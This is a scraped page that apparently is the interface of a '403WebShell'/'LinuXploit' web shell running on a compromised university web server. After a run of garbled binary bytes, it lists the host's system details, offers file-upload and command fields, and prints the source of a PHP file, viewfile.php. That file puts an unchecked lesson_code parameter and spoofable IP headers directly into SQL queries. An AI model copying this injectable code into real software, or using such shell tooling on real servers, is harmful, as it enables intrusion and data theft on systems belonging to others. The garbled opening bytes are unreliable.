h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/lib/newe/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/lib/newe/pages//viewfile.php
<?ob_start();?>
<?php include 'dbconnect.php';?>
<?php
function get_client_ip() {
    $ipaddress = '';
    if (getenv('HTTP_CLIENT_IP'))
        $ipaddress = getenv('HTTP_CLIENT_IP');
    else if(getenv('HTTP_X_FORWARDED_FOR'))
        $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
    else if(getenv('HTTP_X_FORWARDED'))
        $ipaddress = getenv('HTTP_X_FORWARDED');
    else if(getenv('HTTP_FORWARDED_FOR'))
        $ipaddress = getenv('HTTP_FORWARDED_FOR');
    else if(getenv('HTTP_FORWARDED'))
       $ipaddress = getenv('HTTP_FORWARDED');
    else if(getenv('REMOTE_ADDR'))
        $ipaddress = getenv('REMOTE_ADDR');
    else
        $ipaddress = 'UNKNOWN';
    return $ipaddress;
}
$client_ip = get_client_ip();
$current_date = date('Y-m-d');
$current_date1 = $current_date . " 00:00:00";
$current_date2 = $current_date . " 23:59:59";

$lesson_code = (isset($_GET["lesson_code"])) ? $_GET["lesson_code"] : '';
$sql = "SELECT lesson.*, server.server_url FROM lesson INNER JOIN server ON lesson.server_code=server.server_code WHERE lesson.lesson_code=" . $lesson_code;
$query = mysqli_query($conn,$sql);
if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
	//เก็บสถิติการค้นหา ลงตาราง stat_file
	$sql3 = "SELECT ipaddress FROM stat_file";
	$sql3 .= " WHERE ( (enter_date BETWEEN '" . $current_date1 . "' AND '" . $current_date2 . "') AND (ipaddress='" . $client_ip . "') AND (title_code=" . $result["title_code"] . ") )";
	$query3 = mysqli_query($conn,$sql3);
	if (!$result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
		//เพิ่มข้อมูลในตาราง stat_file
		$sql2 = "INSERT INTO stat_file ";
		$sql2 .="(ipaddress, title_code) ";
		$sql2 .="VALUES ";
		$sql2 .="('" . $client_ip . "' ";	
		$sql2 .="," . $result["title_code"] . ") ";
		$query2 = mysqli_query($conn,$sql2);
	}  //if (!$result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
    
	//เปิดไฟล์
	$redirect_url = $result["server_url"] . $result["title_code"] . "/" . $result["mediafile"];	
	header("location:$redirect_url");	                   
} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>

Youez - 2016 - github.com/yon3zu
LinuXploit